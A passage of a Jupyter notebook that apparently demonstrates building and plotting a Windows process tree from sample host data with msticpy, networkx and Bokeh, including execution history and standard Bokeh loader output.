iAxCCjVCCCH+X/t2bMMwEANB8L8Ixeq/LMcugmpAdigshJn0EsYLEAAAiBBqAAAAACKEGgAAAIAIoQYAAAAgQqgBAAAAiBBqAAAAACKEGgAAAIAIoQYAAAAgQqgBAAAAiBBqAAAAACKEGgAAAIAIoQYAAAAgQqgBAAAAiBBqAAAAACKEGgAAAIAIoQYAAAAgQqgBAAAAiBBqAAAAACKEGgAAAIAIoQYAAAAgQqgBAAAAiBBqAAAAACKEGgAAAIAIoQYAAAAgQqgBAAAAiBBqAAAAACKEGgAAAIAIoQYAAAAgQqgBAAAAiBBqAAAAACKEGgAAAIAIoQYAAAAgQqgBAAAAiBBqAAAAACKEGgAAAIAIoQYAAAAgQqgBAAAAiBBqAAAAACKEGgAAAICIPTO/x72/a63Pc+cAAAAAvN45M8fd8DfUAAAAAPAcr08AAAAAEUINAAAAQIRQAwAAABAh1AAAAABECDUAAAAAEReOGRXX4sWdjAAAAABJRU5ErkJggg==\n", "text/plain": [ "
" ] }, "metadata": {}, "output_type": "display_data" } ], "source": [ "import networkx as nx\n", "import matplotlib.pyplot as plt\n", "p_graph = nx.DiGraph()\n", "\n", "p_graph = nx.from_pandas_edgelist(\n", " df=full_tree.reset_index(),\n", " source=\"parent_key\",\n", " target=\"proc_key\",\n", " edge_attr=[\"TimeGenerated\", \"NewProcessName\", \"NewProcessId\"],\n", " create_using=nx.DiGraph,\n", ")\n", "\n", "plt.gcf().set_size_inches((20,20))\n", "pos = nx.circular_layout(p_graph)\n", "nx.draw_networkx(p_graph, pos=pos, with_labels=False, node_size=50)\n", "# Get the root binary name to plot labels (change the split param for Linux)\n", "labels = full_tree.apply(lambda x: x.NewProcessName.split(\"\\\\\")[-1], axis=1).to_dict()\n", "nx.draw_networkx_labels(p_graph, pos, labels=labels, font_size=10, font_color='k', font_family='sans-serif', font_weight='normal', alpha=1.0)\n", "plt.show()" ] } ], "metadata": { "hide_input": false, "history": [ { "cell": { "executionCount": 1, "executionEventId": "c9451ae0-7573-4d33-a1b8-cf5b5be8d389", "hasError": false, "id": "fa78b92a-9c62-42ac-9374-8819e7e97c4a", "outputs": [], "persistentId": "7b5a3079-d2e1-481d-a076-8eaa96f1c430", "text": "import pandas as pd\nimport numpy as np\nprocs = pd.read_pickle(\"../demos/data/processes_on_host.pkl\")" }, "executionTime": "2019-12-13T19:49:28.220Z" }, { "cell": { "executionCount": 2, "executionEventId": "2178d8c6-39f9-4866-bad1-6881e8e1b7f3", "hasError": false, "id": "c9a26d41-49e0-4719-9527-bea817c683fe", "outputs": [], "persistentId": "23f15d93-9749-4e85-a4ca-a112e158bf76", "text": "testdf = procs.iloc[:1000]\npd.to_pickle(testdf, \"../demos/data/win_proc_test.pkl\")" }, "executionTime": "2019-12-13T19:49:31.754Z" }, { "cell": { "executionCount": 3, "executionEventId": "6239dc3f-281d-4506-820b-58aef5a85a7d", "hasError": true, "id": "39db5727-dea8-4b85-bedf-5d9f225bef86", "outputs": [ { "data": { "text/html": "\nThis product includes GeoLite2 data created by MaxMind, available from\nhttps://www.maxmind.com.\n", "text/plain": "" }, "metadata": {}, "output_type": "display_data" }, { "data": { "text/html": "\nThis library uses services provided by ipstack.\nhttps://ipstack.com", "text/plain": "" }, "metadata": {}, "output_type": "display_data" }, { "name": "stdout", "output_type": "stream", "text": "Using Open PageRank. See https://www.domcop.com/openpagerank/what-is-openpagerank\n" }, { "ename": "ModuleNotFoundError", "evalue": "No module named 'msticpy.sectools.process_tree_utils'", "output_type": "error", "traceback": [ "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m", "\u001b[1;31mModuleNotFoundError\u001b[0m Traceback (most recent call last)", "\u001b[1;32m\u001b[0m in \u001b[0;36m\u001b[1;34m\u001b[0m\n\u001b[1;32m----> 1\u001b[1;33m \u001b[1;32mimport\u001b[0m \u001b[0mmsticpy\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0msectools\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mprocess_tree_utils\u001b[0m \u001b[1;32mas\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 2\u001b[0m \u001b[1;32mimport\u001b[0m \u001b[0mmsticpy\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mnbtools\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mprocess_tree\u001b[0m \u001b[1;32mas\u001b[0m \u001b[0mptplot\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 3\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 4\u001b[0m \u001b[0mp_tree\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mbuild_process_tree\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mtestdf\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mshow_progress\u001b[0m\u001b[1;33m=\u001b[0m\u001b[1;32mTrue\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", "\u001b[1;31mModuleNotFoundError\u001b[0m: No module named 'msticpy.sectools.process_tree_utils'" ] } ], "persistentId": "175c1262-ad6d-485c-999b-459cae210ad6", "text": "import msticpy.sectools.process_tree_utils as ptutil\nimport msticpy.nbtools.process_tree as ptplot\n\np_tree = ptutil.build_process_tree(testdf, show_progress=True)" }, "executionTime": "2019-12-13T19:49:41.311Z" }, { "cell": { "executionCount": 1, "executionEventId": "13545446-6121-4660-83e7-26712f31126a", "hasError": false, "id": "49c5edc4-ca62-4d42-85e3-578a4b9c1872", "outputs": [], "persistentId": "7b5a3079-d2e1-481d-a076-8eaa96f1c430", "text": "import pandas as pd\nimport numpy as np\nprocs = pd.read_pickle(\"../demos/data/processes_on_host.pkl\")" }, "executionTime": "2019-12-13T20:26:03.188Z" }, { "cell": { "executionCount": 2, "executionEventId": "ee78bba9-2b9b-4567-9392-985c9b19fb0b", "hasError": false, "id": "8fa864ac-34d2-492c-a5f3-8de85bce1ed3", "outputs": [], "persistentId": "23f15d93-9749-4e85-a4ca-a112e158bf76", "text": "testdf = procs.iloc[:1000]\npd.to_pickle(testdf, \"../demos/data/win_proc_test.pkl\")" }, "executionTime": "2019-12-13T20:26:08.534Z" }, { "cell": { "executionCount": 3, "executionEventId": "f0d41ca3-be7c-4d5d-92b5-b4aca2613c79", "hasError": false, "id": "70acc446-d177-488d-a4e5-153697303b3a", "outputs": [ { "data": { "text/html": "\nThis product includes GeoLite2 data created by MaxMind, available from\nhttps://www.maxmind.com.\n", "text/plain": "" }, "metadata": {}, "output_type": "display_data" }, { "data": { "text/html": "\nThis library uses services provided by ipstack.\nhttps://ipstack.com", "text/plain": "" }, "metadata": {}, "output_type": "display_data" }, { "name": "stdout", "output_type": "stream", "text": "Using Open PageRank. See https://www.domcop.com/openpagerank/what-is-openpagerank\n" }, { "data": { "application/vnd.jupyter.widget-view+json": { "model_id": "c8adaea0e82d4ae48eec39e0f9e0a986", "version_major": 2, "version_minor": 0 }, "text/plain": "HBox(children=(IntProgress(value=0, bar_style='info', description='Progress:'), Label(value='0%')))" }, "metadata": {}, "output_type": "display_data" }, { "name": "stdout", "output_type": "stream", "text": "{'Processes': 1010, 'RootProcesses': 10, 'LeafProcesses': 815, 'BranchProcesses': 185, 'IsolatedProcesses': 0, 'LargestTreeDepth': 7}\n" } ], "persistentId": "175c1262-ad6d-485c-999b-459cae210ad6", "text": "import msticpy.sectools.process_tree_utils as ptutil\nimport msticpy.nbtools.process_tree as ptplot\n\np_tree = ptutil.build_process_tree(testdf, show_progress=True)" }, "executionTime": "2019-12-13T20:26:16.580Z" }, { "cell": { "executionCount": 4, "executionEventId": "554f1b97-5220-4399-bbd7-c1da5258d423", "hasError": false, "id": "fc64ecac-8791-4324-87f4-7ebb47f5b1ef", "outputs": [ { "data": { "text/html": "\n
\n \n Loading BokehJS ...\n
" }, "metadata": {}, "output_type": "display_data" }, { "data": { "application/javascript": "\n(function(root) {\n function now() {\n return new Date();\n }\n\n var force = true;\n\n if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n root._bokeh_onload_callbacks = [];\n root._bokeh_is_loading = undefined;\n }\n\n var JS_MIME_TYPE = 'application/javascript';\n var HTML_MIME_TYPE = 'text/html';\n var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n var CLASS_NAME = 'output_bokeh rendered_html';\n\n /**\n * Render data to the DOM node\n */\n function render(props, node) {\n var script = document.createElement(\"script\");\n node.appendChild(script);\n }\n\n /**\n * Handle when an output is cleared or removed\n */\n function handleClearOutput(event, handle) {\n var cell = handle.cell;\n\n var id = cell.output_area._bokeh_element_id;\n var server_id = cell.output_area._bokeh_server_id;\n // Clean up Bokeh references\n if (id != null && id in Bokeh.index) {\n Bokeh.index[id].model.document.clear();\n delete Bokeh.index[id];\n }\n\n if (server_id !== undefined) {\n // Clean up Bokeh references\n var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n cell.notebook.kernel.execute(cmd, {\n iopub: {\n output: function(msg) {\n var id = msg.content.text.trim();\n if (id in Bokeh.index) {\n Bokeh.index[id].model.document.clear();\n delete Bokeh.index[id];\n }\n }\n }\n });\n // Destroy server and session\n var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n cell.notebook.kernel.execute(cmd);\n }\n }\n\n /**\n * Handle when a new output is added\n */\n function handleAddOutput(event, handle) {\n var output_area = handle.output_area;\n var output = handle.output;\n\n // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n if ((output.output_type != \"display_data\") || (!output.data.hasOwnProperty(EXEC_MIME_TYPE))) {\n return\n }\n\n var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n // store reference to embed id on output_area\n output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n }\n if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n var bk_div = document.createElement(\"div\");\n bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n var script_attrs = bk_div.children[0].attributes;\n for (var i = 0; i < script_attrs.length; i++) {\n toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n }\n // store reference to server id on output_area\n output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n }\n }\n\n function register_renderer(events, OutputArea) {\n\n function append_mime(data, metadata, element) {\n // create a DOM node to render to\n var toinsert = this.create_output_subarea(\n metadata,\n CLASS_NAME,\n EXEC_MIME_TYPE\n );\n this.keyboard_manager.register_events(toinsert);\n // Render to node\n var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n render(props, toinsert[toinsert.length - 1]);\n element.append(toinsert);\n return toinsert\n }\n\n /* Handle when an output is cleared or removed */\n events.on('clear_output.CodeCell', handleClearOutput);\n events.on('delete.Cell', handleClearOutput);\n\n /* Handle when a new output is added */\n events.on('output_added.OutputArea', handleAddOutput);\n\n /**\n * Register the mime type and append_mime function with output_area\n */\n OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n /* Is output safe? */\n safe: true,\n /* Index of renderer in `output_area.display_order` */\n index: 0\n });\n }\n\n // register the mime type if in Jupyter Notebook environment and previously unregistered\n if (root.Jupyter !== undefined) {\n var events = require('base/js/events');\n var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n register_renderer(events, OutputArea);\n }\n }\n\n \n if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n root._bokeh_timeout = Date.now() + 5000;\n root._bokeh_failed_load = false;\n }\n\n var NB_LOAD_WARNING = {'data': {'text/html':\n \"
\\n\"+\n \"

\\n\"+\n \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n \"

\\n\"+\n \"
    \\n\"+\n \"
  • re-rerun `output_notebook()` to attempt to load from CDN again, or
    • \\n\"+\n \"
  • use INLINE resources instead, as so:
    • \\n\"+\n \"
\\n\"+\n \"\\n\"+\n \"from bokeh.resources import INLINE\\n\"+\n \"output_notebook(resources=INLINE)\\n\"+\n \"\\n\"+\n \"
\"}};\n\n function display_loaded() {\n var el = document.getElementById(\"1001\");\n if (el != null) {\n el.textContent = \"BokehJS is loading...\";\n }\n if (root.Bokeh !== undefined) {\n if (el != null) {\n el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n }\n } else if (Date.now() < root._bokeh_timeout) {\n setTimeout(display_loaded, 100)\n }\n }\n\n\n function run_callbacks() {\n try {\n root._bokeh_onload_callbacks.forEach(function(callback) {\n if (callback != null)\n callback();\n });\n } finally {\n delete root._bokeh_onload_callbacks\n }\n console.debug(\"Bokeh: all callbacks have finished\");\n }\n\n function load_libs(css_urls, js_urls, callback) {\n if (css_urls == null) css_urls = [];\n if (js_urls == null) js_urls = [];\n\n root._bokeh_onload_callbacks.push(callback);\n if (root._bokeh_is_loading > 0) {\n console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n return null;\n }\n if (js_urls == null || js_urls.length === 0) {\n run_callbacks();\n return null;\n }\n console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n function on_load() {\n root._bokeh_is_loading--;\n if (root._bokeh_is_loading === 0) {\n console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n run_callbacks()\n }\n }\n\n function on_error() {\n console.error(\"failed to load \" + url);\n }\n\n for (var i = 0; i < css_urls.length; i++) {\n var url = css_urls[i];\n const element = document.createElement(\"link\");\n element.onload = on_load;\n element.onerror = on_error;\n element.rel = \"stylesheet\";\n element.type = \"text/css\";\n element.href = url;\n console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n document.body.appendChild(element);\n }\n\n for (var i = 0; i < js_urls.length; i++) {\n var url = js_urls[i];\n var element = document.createElement('script');\n element.onload = on_load;\n element.onerror = on_error;\n element.async = false;\n element.src = url;\n console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n document.head.appendChild(element);\n }\n };var element = document.getElementById(\"1001\");\n if (element == null) {\n console.error(\"Bokeh: ERROR: autoload.js configured with elementid '1001' but no matching script tag was found. \")\n return false;\n }\n\n function inject_raw_css(css) {\n const element = document.createElement(\"style\");\n element.appendChild(document.createTextNode(css));\n document.body.appendChild(element);\n }\n\n \n var js_urls = [\"https://cdn.pydata.org/bokeh/release/bokeh-1.4.0.min.js\", \"https://cdn.pydata.org/bokeh/release/bokeh-widgets-1.4.0.min.js\", \"https://cdn.pydata.org/bokeh/release/bokeh-tables-1.4.0.min.js\", \"https://cdn.pydata.org/bokeh/release/bokeh-gl-1.4.0.min.js\"];\n var css_urls = [];\n \n\n var inline_js = [\n function(Bokeh) {\n Bokeh.set_log_level(\"info\");\n },\n function(Bokeh) {\n \n \n }\n ];\n\n function run_inline_js() {\n \n if (root.Bokeh !== undefined || force === true) {\n \n for (var i = 0; i < inline_js.length; i++) {\n inline_js[i].call(root, root.Bokeh);\n }\n if (force === true) {\n display_loaded();\n }} else if (Date.now() < root._bokeh_timeout) {\n setTimeout(run_inline_js, 100);\n } else if (!root._bokeh_failed_load) {\n console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n root._bokeh_failed_load = true;\n } else if (force !== true) {\n var cell = $(document.getElementById(\"1001\")).parents('.cell').data().cell;\n cell.output_area.append_execute_result(NB_LOAD_WARNING)\n }\n\n }\n\n if (root._bokeh_is_loading === 0) {\n console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n run_inline_js();\n } else {\n load_libs(css_urls, js_urls, function() {\n console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n run_inline_js();\n });\n }\n}(window));", "application/vnd.bokehjs_load.v0+json": "\n(function(root) {\n function now() {\n return new Date();\n }\n\n var force = true;\n\n if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n root._bokeh_onload_callbacks = [];\n root._bokeh_is_loading = undefined;\n }\n\n \n\n \n if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n root._bokeh_timeout = Date.now() + 5000;\n root._bokeh_failed_load = false;\n }\n\n var NB_LOAD_WARNING = {'data': {'text/html':\n \"
\\n\"+\n \"

\\n\"+\n \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n \"

\\n\"+\n \"
    \\n\"+\n \"
  • re-rerun `output_notebook()` to attempt to load from CDN again, or
    • \\n\"+\n \"
  • use INLINE resources instead, as so:
    • \\n\"+\n \"
\\n\"+\n \"\\n\"+\n \"from bokeh.resources import INLINE\\n\"+\n \"output_notebook(resources=INLINE)\\n\"+\n \"\\n\"+\n \"
\"}};\n\n function display_loaded() {\n var el = document.getElementById(\"1001\");\n if (el != null) {\n el.textContent = \"BokehJS is loading...\";\n }\n if (root.Bokeh !== undefined) {\n if (el != null) {\n el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n }\n } else if (Date.now() < root._bokeh_timeout) {\n setTimeout(display_loaded, 100)\n }\n }\n\n\n function run_callbacks() {\n try {\n root._bokeh_onload_callbacks.forEach(function(callback) {\n if (callback != null)\n callback();\n });\n } finally {\n delete root._bokeh_onload_callbacks\n }\n console.debug(\"Bokeh: all callbacks have finished\");\n }\n\n function load_libs(css_urls, js_urls, callback) {\n if (css_urls == null) css_urls = [];\n if (js_urls == null) js_urls = [];\n\n root._bokeh_onload_callbacks.push(callback);\n if (root._bokeh_is_loading > 0) {\n console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n return null;\n }\n if (js_urls == null || js_urls.length === 0) {\n run_callbacks();\n return null;\n }\n console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n function on_load() {\n root._bokeh_is_loading--;\n if (root._bokeh_is_loading === 0) {\n console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n run_callbacks()\n }\n }\n\n function on_error() {\n console.error(\"failed to load \" + url);\n }\n\n for (var i = 0; i < css_urls.length; i++) {\n var url = css_urls[i];\n const element = document.createElement(\"link\");\n element.onload = on_load;\n element.onerror = on_error;\n element.rel = \"stylesheet\";\n element.type = \"text/css\";\n element.href = url;\n console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n document.body.appendChild(element);\n }\n\n for (var i = 0; i < js_urls.length; i++) {\n var url = js_urls[i];\n var element = document.createElement('script');\n element.onload = on_load;\n element.onerror = on_error;\n element.async = false;\n element.src = url;\n console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n document.head.appendChild(element);\n }\n };var element = document.getElementById(\"1001\");\n if (element == null) {\n console.error(\"Bokeh: ERROR: autoload.js configured with elementid '1001' but no matching script tag was found. \")\n return false;\n }\n\n function inject_raw_css(css) {\n const element = document.createElement(\"style\");\n element.appendChild(document.createTextNode(css));\n document.body.appendChild(element);\n }\n\n \n var js_urls = [\"https://cdn.pydata.org/bokeh/release/bokeh-1.4.0.min.js\", \"https://cdn.pydata.org/bokeh/release/bokeh-widgets-1.4.0.min.js\", \"https://cdn.pydata.org/bokeh/release/bokeh-tables-1.4.0.min.js\", \"https://cdn.pydata.org/bokeh/release/bokeh-gl-1.4.0.min.js\"];\n var css_urls = [];\n \n\n var inline_js = [\n function(Bokeh) {\n Bokeh.set_log_level(\"info\");\n },\n function(Bokeh) {\n \n \n }\n ];\n\n function run_inline_js() {\n \n if (root.Bokeh !== undefined || force === true) {\n \n for (var i = 0; i < inline_js.length; i++) {\n inline_js[i].call(root, root.Bokeh);\n }\n if (force === true) {\n display_loaded();\n }} else if (Date.now() < root._bokeh_timeout) {\n setTimeout(run_inline_js, 100);\n } else if (!root._bokeh_failed_load) {\n console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n root._bokeh_failed_load = true;\n } else if (force !== true) {\n var cell = $(document.getElementById(\"1001\")).parents('.cell').data().cell;\n cell.output_area.append_execute_result(NB_LOAD_WARNING)\n }\n\n }\n\n if (root._bokeh_is_loading === 0) {\n console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n run_inline_js();\n } else {\n load_libs(css_urls, js_urls, function() {\n console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n run_inline_js();\n });\n }\n}(window));" }, "metadata": {}, "output_type": "display_data" }, { "data": { "text/html": "\n\n\n\n\n\n
\n" }, "metadata": {}, "output_type": "display_data" }, { "data": { "application/javascript": "(function(root) {\n function embed_document(root) {\n \n var docs_json = {\"5635a785-c54a-48f1-a6d1-7fb099a1d973\":{\"roots\":{\"references\":[{\"attributes\":{\"children\":[{\"id\":\"1131\",\"type\":\"Row\"},{\"id\":\"1129\",\"type\":\"DataTable\"}]},\"id\":\"1132\",\"type\":\"Column\"},{\"attributes\":{\"text\":{\"field\":\"Exe\"},\"text_alpha\":{\"value\":0.1},\"text_baseline\":\"middle\",\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1056\",\"type\":\"Dodge\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1057\",\"type\":\"Dodge\"}}},\"id\":\"1060\",\"type\":\"Text\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"value\":\"lightgrey\"},\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":{\"value\":1.0},\"line_color\":{\"value\":\"black\"},\"line_dash\":[4,4],\"line_width\":{\"value\":2},\"render_mode\":\"css\",\"right_units\":\"screen\",\"top_units\":\"screen\"},\"id\":\"1165\",\"type\":\"BoxAnnotation\"},{\"attributes\":{},\"id\":\"1163\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"text\":{\"field\":\"Exe\"},\"text_baseline\":\"middle\",\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1056\",\"type\":\"Dodge\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1057\",\"type\":\"Dodge\"}}},\"id\":\"1059\",\"type\":\"Text\"},{\"attributes\":{},\"id\":\"1138\",\"type\":\"StringFormatter\"},{\"attributes\":{\"range\":{\"id\":\"1008\",\"type\":\"Range1d\"},\"value\":0.25},\"id\":\"1057\",\"type\":\"Dodge\"},{\"attributes\":{\"source\":{\"id\":\"1002\",\"type\":\"ColumnDataSource\"}},\"id\":\"1055\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"1161\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"data_source\":{\"id\":\"1002\",\"type\":\"ColumnDataSource\"},\"glyph\":{\"id\":\"1052\",\"type\":\"Text\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1053\",\"type\":\"Text\"},\"selection_glyph\":null,\"view\":{\"id\":\"1055\",\"type\":\"CDSView\"}},\"id\":\"1054\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"1136\",\"type\":\"StringEditor\"},{\"attributes\":{\"range\":{\"id\":\"1006\",\"type\":\"Range1d\"},\"value\":1.8},\"id\":\"1063\",\"type\":\"Dodge\"},{\"attributes\":{\"items\":[{\"id\":\"1048\",\"type\":\"LegendItem\"}],\"title\":\"Exe\"},\"id\":\"1047\",\"type\":\"Legend\"},{\"attributes\":{\"text\":{\"field\":\"cmd\"},\"text_baseline\":\"middle\",\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"7pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1049\",\"type\":\"Dodge\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1050\",\"type\":\"Dodge\"}}},\"id\":\"1052\",\"type\":\"Text\"},{\"attributes\":{\"callback\":null,\"data\":{\"Account\":[\"NaN\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKG